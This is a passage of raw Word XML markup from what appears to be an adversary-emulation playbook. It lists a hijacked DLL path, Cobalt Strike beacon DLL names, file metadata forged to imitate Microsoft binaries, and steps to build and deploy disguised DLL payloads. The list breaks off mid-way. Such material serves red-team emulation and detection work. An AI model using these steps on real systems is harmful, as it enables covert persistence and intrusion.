          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>HTTPS PAYLOAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337ECDCF" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hijacked DLL: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8BB00"/>
        </w:rPr>
        <w:t>c:\windows\system32\wlbsctrl.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AA4289" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTPS Beacon: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8BB00"/>
        </w:rPr>
        <w:t>c:\windows\system32\services.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C74E6B" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SMB Beacon: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8BB00"/>
        </w:rPr>
        <w:t>c:\windows\system32\services.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1118581C" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">*NOTE: using the same </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> name for each beacon type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8D9C0" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Binary modified using a resource hacker to look similar to other Windows </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7EC681B3" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File Description: Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206AA00C" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File Version: 6.1.7601.17514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AB51E" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Product Name: Internet Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255301B0" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Product Version: 6.1.7601.17514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7482D8" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Copyright: (c) Microsoft Corporation. All rights </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reserved</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1CCC845E" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Date Modified: 7/13/2009 08:41:22 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFED333" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REGISTRY</w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:anchor="registry" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06F94F8E" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256DB029" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WINDOW SERVICE</w:t>
      </w:r>
      <w:hyperlink r:id="rId97" w:anchor="window-service" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C0BE9DC" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70179C5F" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:hyperlink r:id="rId98" w:anchor="wmi" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54D6E7AA" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53824809" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="0C7F77A6">
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="481274F5" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DEPLOYMENT STEPS</w:t>
      </w:r>
      <w:hyperlink r:id="rId99" w:anchor="deployment-steps" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="071DC63B" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CobaltStrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> C2 Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A7624" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Build payloads using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>profile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6FA2F919" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">build </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DLL files - named services.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3B32DC" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use a Resource Hacker utility to modify binaries to match File Attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1B08A6" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dlls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2427A345" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
